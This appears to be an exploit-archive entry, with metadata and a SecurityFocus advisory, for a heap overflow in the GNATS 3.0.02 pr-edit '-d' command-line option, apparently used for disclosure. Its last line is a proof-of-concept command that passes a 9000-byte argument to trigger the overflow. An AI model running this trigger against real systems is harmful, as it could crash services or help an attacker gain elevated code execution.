GNU GNATS 3.0 02 - PR-Edit Command Line Option Heap Corruption

Author: dong-h0un U
type: dos
platform: linux
port: 
date_added: 2003-06-21  
date_updated: 2012-11-18  
verified: 1  
codes: OSVDB-2190  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22814.txt  

source: https://www.securityfocus.com/bid/8003/info

A heap overflow vulnerability has been reported for the pr-edit utility of GNATS. The vulnerability occurs due to insufficient checks performed on the arguments to the '-d' commandline option.

Successful exploitation may result in the execution of attacker-supplied code with potentially elevated privileges.

/usr/local/lib/gnats/./pr-edit -d`perl -e 'print "x"x9000'`